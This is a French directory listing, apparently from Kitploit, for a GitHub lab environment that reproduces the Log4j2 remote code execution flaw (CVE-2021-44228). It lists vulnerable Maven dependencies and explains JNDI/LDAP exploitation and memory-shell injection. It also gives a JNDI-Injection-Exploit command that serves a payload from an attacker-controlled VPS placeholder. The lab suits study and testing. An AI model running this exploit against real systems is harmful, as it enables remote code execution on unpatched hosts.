Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/1in9e/apache-log4j2-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Environnement de validation de l'exécution de code à distance Apache Log4j2 (CVE-2021-44228)

Voir le dépôt
211il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Environnement de vérification RCE Apache Log4j2

Depuis le 09.12.2021

Quelques Références

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

Configuration de l'environnement

Introduction des dépendances Maven et des versions vulnérables

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

Vérification

Utilisation de dnslog pour détecter l'utilisation

0

Utilisation de LDAP et JNDI pour l'exploitation RCE

Cela dépend de la version JDK. Après JDK 11.0.1, 8u191, 7u201, 6u211, il est nécessaire de définir manuellement trustURLCodebase sur true.

Pour un apprentissage détaillé, voir https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

Méthode d'exploitation : combiner avec des outils d'injection JNDI, par exemple JNDI-Injection-Exploit, fastjson_rce_tool, JNDIExploit

Peut également être combiné avec des outils pour implémenter diverses méthodes d'écho publiques, méthodes d'injection de cheval de mémoire (memory shell).

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

À propos

https://github.com/apache/logging-log4j2/tags

Télécharger l’outil